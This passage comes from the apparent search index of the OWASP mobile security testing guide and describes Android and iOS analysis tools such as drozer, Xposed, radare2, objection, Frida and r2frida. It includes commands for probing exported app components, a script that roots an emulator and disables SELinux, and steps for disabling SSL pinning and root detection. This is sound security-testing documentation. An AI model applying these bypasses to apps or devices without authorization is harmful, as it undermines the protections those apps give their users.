"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#using-drozer","title":"Using Drozer","text":"Before you can start using drozer, you'll also need the drozer agent that runs on the Android device itself. Download the latest drozer agent from the GitHub releases page and install it with adb install drozer.apk
.
Once the setup is completed you can start a session to an emulator or a device connected per USB by running adb forward tcp:31415 tcp:31415
and drozer console connect
. This is called direct mode and you can see the full instructions in the User Guide in section \"Starting a Session\". An alternative is to run Drozer in infrastructure mode, where, you are running a drozer server that can handle multiple consoles and agents, and routes sessions between them. You can find the details of how to setup drozer in this mode in the \"Infrastructure Mode\" section of the User Guide.
Now you are ready to begin analyzing apps. A good first step is to enumerate the attack surface of an app which can be done easily with the following command:
dz> run app.package.attacksurface <package>\n
Again, without drozer this would have required several steps. The module app.package.attacksurface
lists activities, broadcast receivers, content providers and services that are exported, hence, they are public and can be accessed through other apps. Once we have identified our attack surface, we can interact with the IPC endpoints through drozer without having to write a separate standalone app as it would be required for certain tasks such as communicating with a content provider.
For example, if the app has an exported Activity that leaks sensitive information we can invoke it with the Drozer module app.activity.start
:
dz> run app.activity.start --component <package> <component name>\n
This previous command will start the activity, hopefully leaking some sensitive information. Drozer has modules for every type of IPC mechanism. Download InsecureBankv2 if you would like to try the modules with an intentionally vulnerable application that illustrates common problems related to IPC endpoints. Pay close attention to the modules in the scanner category as they are very helpful automatically detecting vulnerabilities even in system packages, specially if you are using a ROM provided by your cellphone company. Even SQL injection vulnerabilities in system packages by Google have been identified in the past with drozer.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-commands","title":"Other Drozer commands","text":"Here's a non-exhaustive list of commands you can use to start exploring on Android:
# List all the installed packages\n$ dz> run app.package.list\n\n# Find the package name of a specific app\n$ dz> run app.package.list -f (string to be searched)\n\n# See basic information\n$ dz> run app.package.info -a (package name)\n\n# Identify the exported application components\n$ dz> run app.package.attacksurface (package name)\n\n# Identify the list of exported Activities\n$ dz> run app.activity.info -a (package name)\n\n# Launch the exported Activities\n$ dz> run app.activity.start --component (package name) (component name)\n\n# Identify the list of exported Broadcast receivers\n$ dz> run app.broadcast.info -a (package name)\n\n# Send a message to a Broadcast receiver\n$ dz> run app.broadcast.send --action (broadcast receiver name) -- extra (number of arguments)\n\n# Detect SQL injections in content providers\n$ dz> run scanner.provider.injection -a (package name)\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-resources","title":"Other Drozer resources","text":"Other resources where you might find useful information are:
gplaycli is a Python based CLI tool to search, install and update Android applications from the Google Play Store. Follow the installation steps and you're ready to run it. gplaycli offers several options, please refer to its help (-h
) for more information.
If you're unsure about the package name (or AppID) of an app, you may perform a keyword based search for APKs (-s
):
$ gplaycli -s \"google keep\"\n\nTitle Creator Size Last Update AppID Version\n\nGoogle Keep - notes and lists Google LLC 15.78MB 4 Sep 2019 com.google.android.keep 193510330\nMaps - Navigate & Explore Google LLC 35.25MB 16 May 2019 com.google.android.apps.maps 1016200134\nGoogle Google LLC 82.57MB 30 Aug 2019 com.google.android.googlequicksearchbox 301008048\n
Note that regional (Google Play) restrictions apply when using gplaycli. In order to access apps that are restricted in your country you can use alternative app stores such as the ones described in \"Alternative App Stores\".
"},{"location":"MASTG/tools/android/MASTG-TOOL-0017/","title":"House","text":"House is a runtime mobile application analysis toolkit for Android apps, developed and maintained by the NCC Group and is written in Python.
It's leveraging a running Frida server on a rooted device or the Frida gadget in a repackaged Android app. The intention of House is to allow an easy way of prototyping Frida scripts via its convenient web GUI.
The installation instructions and \"how-to guide\" of House can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0018/","title":"jadx","text":"jadx (Dex to Java Decompiler) is a command line and GUI tool for producing Java source code from Android DEX and APK files - https://github.com/skylot/jadx
"},{"location":"MASTG/tools/android/MASTG-TOOL-0019/","title":"jdb","text":"A Java Debugger which allows to set breakpoints and print application variables. jdb uses the JDWP protocol - https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0020/","title":"JustTrustMe","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/Fuzion24/JustTrustMe
"},{"location":"MASTG/tools/android/MASTG-TOOL-0021/","title":"Magisk","text":"Magisk
(\"Magic Mask\") is one way to root your Android device. It's specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Learn more about rooting your device with Magisk.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0022/","title":"Proguard","text":"ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes and can also be used to delete logging-related code.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0023/","title":"RootCloak Plus","text":"A Cydia Substrate Module used to check for commonly known indications of root - https://github.com/devadvance/rootcloakplus
"},{"location":"MASTG/tools/android/MASTG-TOOL-0024/","title":"Scrcpy","text":"Scrcpy provides display and control of Android devices connected over USB (or TCP/IP). It does not require any root access and it works on GNU/Linux, Windows and macOS.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0025/","title":"SSLUnpinning","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/ac-pm/SSLUnpinning_Xposed
"},{"location":"MASTG/tools/android/MASTG-TOOL-0026/","title":"Termux","text":"Termux is a terminal emulator for Android that provides a Linux environment that works directly with or without rooting and with no setup required. The installation of additional packages is a trivial task thanks to its own APT package manager (which makes a difference in comparison to other terminal emulator apps). You can search for specific packages by using the command pkg search <pkg_name>
and install packages with pkg install <pkg_name>
. You can install Termux straight from Google Play.
Xposed does not work on Android 9 (API level 28). However, it was unofficially ported in 2019 under the name EdXposed, supporting Android 8-10 (API level 26 till 29). You can find the code and usage examples at EdXposed Github repo.
Xposed is a framework that allows to modify the system or application aspect and behavior at runtime, without modifying any Android application package (APK) or re-flashing. Technically, it is an extended version of Zygote that exports APIs for running Java code when a new process is started. Running Java code in the context of the newly instantiated app makes it possible to resolve, hook, and override Java methods belonging to the app. Xposed uses reflection to examine and modify the running app. Changes are applied in memory and persist only during the process' runtime since the application binaries are not modified.
To use Xposed, you need to first install the Xposed framework on a rooted device as explained on XDA-Developers Xposed framework hub. Modules can be installed through the Xposed Installer app, and they can be toggled on and off through the GUI.
Note: given that a plain installation of the Xposed framework is easily detected with SafetyNet, we recommend using Magisk to install Xposed. This way, applications with SafetyNet attestation should have a higher chance of being testable with Xposed modules.
Xposed has been compared to Frida. When you run Frida server on a rooted device, you will end up with a similarly effective setup. Both frameworks deliver a lot of value when you want to do dynamic instrumentation. When Frida crashes the app, you can try something similar with Xposed. Next, similar to the abundance of Frida scripts, you can easily use one of the many modules that come with Xposed, such as the earlier discussed module to bypass SSL pinning (JustTrustMe and SSLUnpinning). Xposed includes other modules, such as Inspeckage which allow you to do more in depth application testing as well. On top of that, you can create your own modules as well to patch often used security mechanisms of Android applications.
Xposed can also be installed on an emulator through the following script:
#!/bin/sh\necho \"Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive -wipe-data'\"\nadb root && adb remount\nadb install SuperSU\\ v2.79.apk #binary can be downloaded from http://www.supersu.com/download\nadb push root_avd-master/SuperSU/x86/su /system/xbin/su\nadb shell chmod 0755 /system/xbin/su\nadb shell setenforce 0\nadb shell su --install\nadb shell su --daemon&\nadb push busybox /data/busybox #binary can be downloaded from https://busybox.net/\n# adb shell \"mount -o remount,rw /system && mv /data/busybox /system/bin/busybox && chmod 755 /system/bin/busybox && /system/bin/busybox --install /system/bin\"\nadb shell chmod 755 /data/busybox\nadb shell 'sh -c \"./data/busybox --install /data\"'\nadb shell 'sh -c \"mkdir /data/xposed\"'\nadb push xposed8.zip /data/xposed/xposed.zip #can be downloaded from https://dl-xda.xposed.info/framework/\nadb shell chmod 0755 /data/xposed\nadb shell 'sh -c \"./data/unzip /data/xposed/xposed.zip -d /data/xposed/\"'\nadb shell 'sh -c \"cp /data/xposed/xposed/META-INF/com/google/android/*.* /data/xposed/xposed/\"'\necho \"Now adb shell and do 'su', next: go to ./data/xposed/xposed, make flash-script.sh executable and run it in that directory after running SUperSU\"\necho \"Next, restart emulator\"\necho \"Next, adb install XposedInstaller_3.1.5.apk\"\necho \"Next, run installer and then adb reboot\"\necho \"Want to use it again? Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive'\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/","title":"radare2 for Android","text":"radare2 (r2) is a popular open source reverse engineering framework for disassembling, debugging, patching and analyzing binaries that is scriptable and supports many architectures and file formats including Android and iOS apps. For Android, Dalvik DEX (odex, multidex), ELF (executables, .so, ART) and Java (JNI and Java classes) are supported. It also contains several useful scripts that can help you during mobile application analysis as it offers low level disassembling and safe static analysis that comes in handy when traditional tools fail.
radare2 implements a rich command line interface (CLI) where you can perform the mentioned tasks. However, if you're not really comfortable using the CLI for reverse engineering you may want to consider using the Web UI (via the -H
flag) or the even more convenient Qt and C++ GUI version called iaito. Do keep in mind that the CLI, and more concretely its Visual Mode and its scripting capabilities (r2pipe), are the core of radare2's power and it's definitely worth learning how to use it.
Please refer to radare2's official installation instructions. We highly recommend to always install radare2 from the GitHub version instead of via common package managers such as APT. Radare2 is in very active development, which means that third party repositories are often outdated.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/#using-radare2","title":"Using radare2","text":"The radare2 framework comprises a set of small utilities that can be used from the r2 shell or independently as CLI tools. These utilities include rabin2
, rasm2
, rahash2
, radiff2
, rafind2
, ragg2
, rarun2
, rax2
, and of course r2
, which is the main one.
For example, you can use rafind2
to read strings directly from an encoded Android Manifest (AndroidManifest.xml):
# Permissions\n$ rafind2 -ZS permission AndroidManifest.xml\n# Activities\n$ rafind2 -ZS activity AndroidManifest.xml\n# Content providers\n$ rafind2 -ZS provider AndroidManifest.xml\n# Services\n$ rafind2 -ZS service AndroidManifest.xml\n# Receivers\n$ rafind2 -ZS receiver AndroidManifest.xml\n
Or use rabin2
to get information about a binary file:
$ rabin2 -I UnCrackable-Level1/classes.dex\narch dalvik\nbaddr 0x0\nbinsz 5528\nbintype class\nbits 32\ncanary false\nretguard false\nclass 035\ncrypto false\nendian little\nhavecode true\nladdr 0x0\nlang dalvik\nlinenum false\nlsyms false\nmachine Dalvik VM\nmaxopsz 16\nminopsz 1\nnx false\nos linux\npcalign 0\npic false\nrelocs false\nsanitiz false\nstatic true\nstripped false\nsubsys java\nva true\nsha1 12-5508c b7fafe72cb521450c4470043caa332da61d1bec7\nadler32 12-5528c 00000000\n
Type rabin2 -h
to see all options:
$ rabin2 -h\nUsage: rabin2 [-AcdeEghHiIjlLMqrRsSUvVxzZ] [-@ at] [-a arch] [-b bits] [-B addr]\n [-C F:C:D] [-f str] [-m addr] [-n str] [-N m:M] [-P[-P] pdb]\n [-o str] [-O str] [-k query] [-D lang symname] file\n -@ [addr] show section, symbol or import at addr\n -A list sub-binaries and their arch-bits pairs\n -a [arch] set arch (x86, arm, .. or <arch>_<bits>)\n -b [bits] set bits (32, 64 ...)\n -B [addr] override base address (pie bins)\n -c list classes\n -cc list classes in header format\n -H header fields\n -i imports (symbols imported from libraries)\n -I binary info\n -j output in json\n ...\n
Use the main r2
utility to access the r2 shell. You can load DEX binaries just like any other binary:
r2 classes.dex\n
Enter r2 -h
to see all available options. A very commonly used flag is -A
, which triggers an analysis after loading the target binary. However, this should be used sparingly and with small binaries as it is very time and resource consuming. You can learn more about this in the chapter \"Tampering and Reverse Engineering on Android\".
Once in the r2 shell, you can also access functions offered by the other radare2 utilities. For example, running i
will print the information of the binary, exactly as rabin2 -I
does.
To print all the strings use rabin2 -Z
or the command iz
(or the less verbose izq
) from the r2 shell.
[0x000009c8]> izq\n0xc50 39 39 /dev/com.koushikdutta.superuser.daemon/\n0xc79 25 25 /system/app/Superuser.apk\n...\n0xd23 44 44 5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\n0xd51 32 32 8d127684cbc37c17616d806cf50473cc\n0xd76 6 6 <init>\n0xd83 10 10 AES error:\n0xd8f 20 20 AES/ECB/PKCS7Padding\n0xda5 18 18 App is debuggable!\n0xdc0 9 9 CodeCheck\n0x11ac 7 7 Nope...\n0x11bf 14 14 Root detected!\n
Most of the time you can append special options to your commands such as q
to make the command less verbose (quiet) or j
to give the output in JSON format (use ~{}
to prettify the JSON string).
[0x000009c8]> izj~{}\n[\n {\n \"vaddr\": 3152,\n \"paddr\": 3152,\n \"ordinal\": 1,\n \"size\": 39,\n \"length\": 39,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L2Rldi9jb20ua291c2hpa2R1dHRhLnN1cGVydXNlci5kYWVtb24v\"\n },\n {\n \"vaddr\": 3193,\n \"paddr\": 3193,\n \"ordinal\": 2,\n \"size\": 25,\n \"length\": 25,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L3N5c3RlbS9hcHAvU3VwZXJ1c2VyLmFwaw==\"\n },\n
You can print the class names and their methods with the r2 command ic
(information classes).
[0x000009c8]> ic\n...\n0x0000073c [0x00000958 - 0x00000abc] 356 class 5 Lsg/vantagepoint/uncrackable1/MainActivity\n:: Landroid/app/Activity;\n0x00000958 method 0 pC Lsg/vantagepoint/uncrackable1/MainActivity.method.<init>()V\n0x00000970 method 1 P Lsg/vantagepoint/uncrackable1/MainActivity.method.a(Ljava/lang/String;)V\n0x000009c8 method 2 r Lsg/vantagepoint/uncrackable1/MainActivity.method.onCreate (Landroid/os/Bundle;)V\n0x00000a38 method 3 p Lsg/vantagepoint/uncrackable1/MainActivity.method.verify (Landroid/view/View;)V\n0x0000075c [0x00000acc - 0x00000bb2] 230 class 6 Lsg/vantagepoint/uncrackable1/a :: Ljava/lang/Object;\n0x00000acc method 0 sp Lsg/vantagepoint/uncrackable1/a.method.a(Ljava/lang/String;)Z\n0x00000b5c method 1 sp Lsg/vantagepoint/uncrackable1/a.method.b(Ljava/lang/String;)[B\n
You can print the imported methods with the r2 command ii
(information imports).
[0x000009c8]> ii\n[Imports]\nNum Vaddr Bind Type Name\n...\n 29 0x000005cc NONE FUNC Ljava/lang/StringBuilder.method.append(Ljava/lang/String;) Ljava/lang/StringBuilder;\n 30 0x000005d4 NONE FUNC Ljava/lang/StringBuilder.method.toString()Ljava/lang/String;\n 31 0x000005dc NONE FUNC Ljava/lang/System.method.exit(I)V\n 32 0x000005e4 NONE FUNC Ljava/lang/System.method.getenv(Ljava/lang/String;)Ljava/lang/String;\n 33 0x000005ec NONE FUNC Ljavax/crypto/Cipher.method.doFinal([B)[B\n 34 0x000005f4 NONE FUNC Ljavax/crypto/Cipher.method.getInstance(Ljava/lang/String;) Ljavax/crypto/Cipher;\n 35 0x000005fc NONE FUNC Ljavax/crypto/Cipher.method.init(ILjava/security/Key;)V\n 36 0x00000604 NONE FUNC Ljavax/crypto/spec/SecretKeySpec.method.<init>([BLjava/lang/String;)V\n
A common approach when inspecting a binary is to search for something, navigate to it and visualize it in order to interpret the code. One of the ways to find something using radare2 is by filtering the output of specific commands, i.e. to grep them using ~
plus a keyword (~+
for case-insensitive). For example, we might know that the app is verifying something, we can inspect all radare2 flags and see where we find something related to \"verify\".
When loading a file, radare2 tags everything it's able to find. These tagged names or references are called flags. You can access them via the command f
.
In this case we will grep the flags using the keyword \"verify\":
[0x000009c8]> f~+verify\n0x00000a38 132 sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n0x00000a38 132 method.public.Lsg_vantagepoint_uncrackable1_MainActivity. \\\nLsg_vantagepoint_uncrackable1\n _MainActivity.method.verify_Landroid_view_View__V\n0x00001400 6 str.verify\n
It seems that we've found one method in 0x00000a38 (that was tagged two times) and one string in 0x00001400. Let's navigate (seek) to that method by using its flag:
[0x000009c8]> s sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n
And of course you can also use the disassembler capabilities of r2 and print the disassembly with the command pd
(or pdf
if you know you're already located in a function).
[0x00000a38]> pd\n
r2 commands normally accept options (see pd?
), e.g. you can limit the opcodes displayed by appending a number (\"N\") to the command pd N
.
Instead of just printing the disassembly to the console you may want to enter the so-called Visual Mode by typing V
.
By default, you will see the hexadecimal view. By typing p
you can switch to different views, such as the disassembly view:
Radare2 offers a Graph Mode that is very useful to follow the flow of the code. You can access it from the Visual Mode by typing V
:
This is only a selection of some radare2 commands to start getting some basic information from Android binaries. Radare2 is very powerful and has dozens of commands that you can find on the radare2 command documentation. Radare2 will be used throughout the guide for different purposes such as reversing code, debugging or performing binary analysis. We will also use it in combination with other frameworks, especially Frida (see the r2frida section for more information).
Please refer to the chapter \"Tampering and Reverse Engineering on Android\" for more detailed use of radare2 on Android, especially when analyzing native libraries. You may also want to read the official radare2 book.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/","title":"objection for Android","text":"Objection offers several features specific to Android. You can find the full list of features on the project's page, but here are a few interesting ones:
If you have a rooted device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to root an Android device or the app may contain advanced RASP controls for root detection, so injecting a frida-gadget may be the easiest way to bypass those controls.
The ability to perform advanced dynamic analysis on non-rooted devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or bypass basic security controls.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/#using-objection-on-android","title":"Using Objection on Android","text":"Starting up Objection depends on whether you've patched the APK or whether you are using a rooted device running Frida-server. For running a patched APK, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched APK\nobjection explore\n\n# Find the correct name using frida-ps\n$ frida-ps -Ua | grep -i telegram\n30268 Telegram org.telegram.messenger\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"org.telegram.messenger\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ android sslpinning disable\n\n# List items in the keystore\n$ android keystore list\n\n# Try to circumvent root detection\n$ android root disable\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/android/MASTG-TOOL-0030/","title":"Angr","text":"Angr is a Python framework for analyzing binaries. It is useful for both static and dynamic symbolic (\"concolic\") analysis. In other words: given a binary and a requested state, Angr will try to get to that state, using formal methods (a technique used for static code analysis) to find a path, as well as brute forcing. Using angr to get to the requested state is often much faster than taking manual steps for debugging and searching the path towards the required state. Angr operates on the VEX intermediate language and comes with a loader for ELF/ARM binaries, so it is perfect for dealing with native code, such as native Android binaries.
Angr allows for disassembly, program instrumentation, symbolic execution, control-flow analysis, data-dependency analysis, decompilation and more, given a large set of plugins.
Since version 8, Angr is based on Python 3, and can be installed with pip on *nix operating systems, macOS and Windows:
pip install angr\n
Some of angr's dependencies contain forked versions of the Python modules Z3 and PyVEX, which would overwrite the original versions. If you're using those modules for anything else, you should create a dedicated virtual environment with Virtualenv. Alternatively, you can always use the provided docker container. See the installation guide for more details.
Comprehensive documentation, including an installation guide, tutorials, and usage examples are available on Angr's Gitbooks page. A complete API reference is also available.
You can use angr from a Python REPL - such as iPython - or script your approaches. Although angr has a bit of a steep learning curve, we do recommend using it when you want to brute force your way to a given state of an executable. Please see the \"Symbolic Execution\" section of the \"Reverse Engineering and Tampering\" chapter as a great example on how this can work.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0099/","title":"FlowDroid","text":"FlowDroid is an open-source tool based in soot, a framework dedicated to analyzing and translating Java bytecode for easier analysis. The tool handles the nuances of Android app lifecycles (like onCreate
, onStart
, onPause
, and others) and its UI components during analysis and performs taint analysis that is:
FlowDroid can be used in two ways: as a standalone command line tool for quick analyses or as a library for more complex investigations. In addition to performing taint analysis, FlowDroid can also generate call graphs, as illustrated in this blog post.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0031/","title":"Frida","text":"Frida is a free and open source dynamic code instrumentation toolkit written by Ole Andr\u00e9 Vadla Ravn\u00e5s that works by injecting the QuickJS JavaScript engine (previously Duktape and V8) into the instrumented process. Frida lets you execute snippets of JavaScript into native apps on Android and iOS (as well as on other platforms).
To install Frida locally, simply run:
pip install frida-tools\n
Or refer to the installation page for more details.
Code can be injected in several ways. For example, Xposed permanently modifies the Android app loader, providing hooks for running your own code every time a new process is started. In contrast, Frida implements code injection by writing code directly into the process memory. When attached to a running app:
frida-agent.so
).Frida offers three modes of operation:
LD_PRELOAD
or DYLD_INSERT_LIBRARIES
. You can configure the frida-gadget to run autonomously and load a script from the filesystem (e.g. path relative to where the Gadget binary resides).Independently of the chosen mode, you can make use of the Frida JavaScript APIs to interact with the running process and its memory. Some of the fundamental APIs are:
Frida also provides a couple of simple tools built on top of the Frida API and available right from your terminal after installing frida-tools via pip. For instance:
frida
) for quick script prototyping and try/error scenarios.frida-ps
to obtain a list of all apps (or processes) running on the device including their names, identifiers and PIDs.frida-ls-devices
to list your connected devices running Frida servers or agents.frida-trace
to quickly trace methods that are part of an iOS app or that are implemented inside an Android native library.In addition, you'll also find several open source Frida-based tools, such as:
We will be using all of these tools throughout the guide.
You can use these tools as-is, tweak them to your needs, or take as excellent examples on how to use the APIs. Having them as an example is very helpful when you write your own hooking scripts or when you build introspection tools to support your reverse engineering workflow.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0032/","title":"Frida CodeShare","text":"Frida CodeShare is a repository containing a collection of ready-to-run Frida scripts which can enormously help when performing concrete tasks both on Android as on iOS as well as also serve as inspiration to build your own scripts. Two representative examples are:
Using them is as simple as including the --codeshare <handler>
flag and a handler when using the Frida CLI. For example, to use \"ObjC method observer\", enter the following:
frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0033/","title":"Ghidra","text":"Ghidra is an open source software reverse engineering (SRE) suite of tools developed by the United State of America's National Security Agency's (NSA) Research Directorate. Ghidra is a versatile tool which comprises of a disassembler, decompiler and a built-in scripting engine for advanced usage. Please refer to the installation guide on how to install it and also look at the cheat sheet for a first overview of available commands and shortcuts. In this section, we will have walk-through on how to create a project, view disassembly and decompiled code for a binary.
Start Ghidra using ghidraRun
(*nix) or ghidraRun.bat
(Windows), depending on the platform you are on. Once Ghidra is fired up, create a new project by specifying the project directory. You will be greeted by a window as shown below:
In your new Active Project you can import an app binary by going to File -> Import File and choosing the desired file.
If the file can be properly processed, Ghidra will show meta-information about the binary before starting the analysis.
To get the disassembled code for the binary file chosen above, double click the imported file from the Active Project window. Click yes and analyze for auto-analysis on the subsequent windows. Auto-analysis will take some time depending on the size of the binary, the progress can be tracked in the bottom right corner of the code browser window. Once auto-analysis is completed you can start exploring the binary.
The most important windows to explore a binary in Ghidra are the Listing (Disassembly) window, the Symbol Tree window and the Decompiler window, which shows the decompiled version of the function selected for disassembly. The Display Function Graph option shows control flow graph of the selected function.
There are many other functionalities available in Ghidra and most of them can be explored by opening the Window menu. For example, if you want to examine the strings present in the binary, open the Defined Strings option. We will discuss other advanced functionalities while analyzing various binaries for Android and iOS platforms in the coming chapters.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0034/","title":"LIEF","text":"The purpose of LIEF is to provide a cross platform library to parse, modify and abstract ELF, PE and MachO formats. With it you can, for instance, inject a certain library as a dependency of a native library, which an application already loads by default. - https://lief.quarkslab.com/
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0035/","title":"MobSF","text":"MobSF (Mobile Security Framework) is an automated, all-in-one mobile application pentesting framework capable of performing static and dynamic analysis. The easiest way of getting MobSF started is via Docker.
docker pull opensecurity/mobile-security-framework-mobsf\ndocker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest\n
Or install and start it locally on your host computer by running:
# Setup\ngit clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\ncd Mobile-Security-Framework-MobSF\n./setup.sh # For Linux and Mac\nsetup.bat # For Windows\n\n# Installation process\n./run.sh # For Linux and Mac\nrun.bat # For Windows\n
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the APK you want to analyze into the upload area and MobSF will start its job.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0036/","title":"r2frida","text":"r2frida is a project that allows radare2 to connect to Frida, effectively merging the powerful reverse engineering capabilities of radare2 with the dynamic instrumentation toolkit of Frida. r2frida can be used in both on Android and iOS, allowing you to:
Please refer to r2frida's official installation instructions.
With frida-server running, you should now be able to attach to it using the pid, spawn path, host and port, or device-id. For example, to attach to PID 1234:
r2 frida://1234\n
For more examples on how to connect to frida-server, see the usage section in the r2frida's README page.
The following examples were executed using an Android app but also apply to iOS apps.
Once in the r2frida session, all commands start with :
or =!
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
See all options with r2 frida://?
.
[0x00000000]> :i\narch x86\nbits 64\nos linux\npid 2218\nuid 1000\nobjc false\nruntime V8\njava false\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\n
To search in memory for a specific keyword, you may use the search command \\/
:
[0x00000000]> \\/ unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n0x561f072d89ee hit12_0 unacceptable policyunsupported md algorithmvar bad valuec\n0x561f0732a91a hit12_1 unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61\n
To output the search results in JSON format, we simply add j
to our previous search command (just as we do in the r2 shell). This can be used in most of the commands:
[0x00000000]> \\/j unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n{\"address\":\"0x561f072c4223\",\"size\":12,\"flag\":\"hit14_1\",\"content\":\"unacceptable \\\npolicyunsupported md algorithmvar bad valuec0\"},{\"address\":\"0x561f072c4275\", \\\n\"size\":12,\"flag\":\"hit14_2\",\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 \\\n63 63 65 70 74 61\"},{\"address\":\"0x561f072c42c8\",\"size\":12,\"flag\":\"hit14_3\", \\\n\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 \"},\n...\n
To list the loaded libraries use the command :il
and filter the results using the internal grep from radare2 with the command ~
. For example, the following command will list the loaded libraries matching the keywords keystore
, ssl
and crypto
:
[0x00000000]> :il~keystore,ssl,crypto\n0x00007f3357b8e000 libssl.so.1.1\n0x00007f3357716000 libcrypto.so.1.1\n
Similarly, to list the exports and filter the results by a specific keyword:
[0x00000000]> :iE libssl.so.1.1~CIPHER\n0x7f3357bb7ef0 f SSL_CIPHER_get_bits\n0x7f3357bb8260 f SSL_CIPHER_find\n0x7f3357bb82c0 f SSL_CIPHER_get_digest_nid\n0x7f3357bb8380 f SSL_CIPHER_is_aead\n0x7f3357bb8270 f SSL_CIPHER_get_cipher_nid\n0x7f3357bb7ed0 f SSL_CIPHER_get_name\n0x7f3357bb8340 f SSL_CIPHER_get_auth_nid\n0x7f3357bb7930 f SSL_CIPHER_description\n0x7f3357bb8300 f SSL_CIPHER_get_kx_nid\n0x7f3357bb7ea0 f SSL_CIPHER_get_version\n0x7f3357bb7f10 f SSL_CIPHER_get_id\n
To list or set a breakpoint use the command db. This is useful when analyzing/modifying memory:
[0x00000000]> :db\n
Finally, remember that you can also run Frida JavaScript code with \\.
plus the name of the script:
[0x00000000]> \\. agent.js\n
You can find more examples on how to use r2frida on their Wiki project.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0037/","title":"RMS Runtime Mobile Security","text":"RMS - Runtime Mobile Security is a runtime mobile application analysis toolkit, supporting Android and iOS Apps. It offers a web GUI and is written in Python.
It's leveraging a running Frida server on a jailbroken device with the following out-of-box functionalities:
The installation instructions and \"how-to guide\" of RMS can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0038/","title":"objection","text":"Objection is a \"runtime mobile exploration toolkit, powered by Frida\". Its main goal is to allow security testing on non-rooted devices through an intuitive interface.
Objection achieves this goal by providing you with the tools to easily inject the Frida gadget into an application by repackaging it. This way, you can deploy the repackaged app to the non-rooted/non-jailbroken device by sideloading it. Objection also provides a REPL that allows you to interact with the application, giving you the ability to perform any action that the application can perform.
Objection can be installed through pip as described on Objection's Wiki.
pip3 install objection\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0098/","title":"iaito","text":"Iaito is the official graphical user interface for radare2, an open-source reverse engineering framework. This user-friendly tool simplifies the reverse engineering process by providing a graphical interface that integrates seamlessly with radare2's powerful features. With a focus on simplicity, keybindings, and radare2-style workflows, Iaito is a valuable resource for both experienced reverse engineers and those new to the field, offering a more accessible and efficient way to work with radare2.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/","title":"Frida for iOS","text":"Frida supports interaction with the Objective-C runtime through the ObjC API. You'll be able to hook and call both Objective-C and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on iOS:
